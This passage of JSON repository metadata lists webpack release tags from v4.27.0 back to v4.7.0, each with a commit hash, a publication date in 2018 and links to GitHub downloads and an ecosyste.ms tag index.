.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep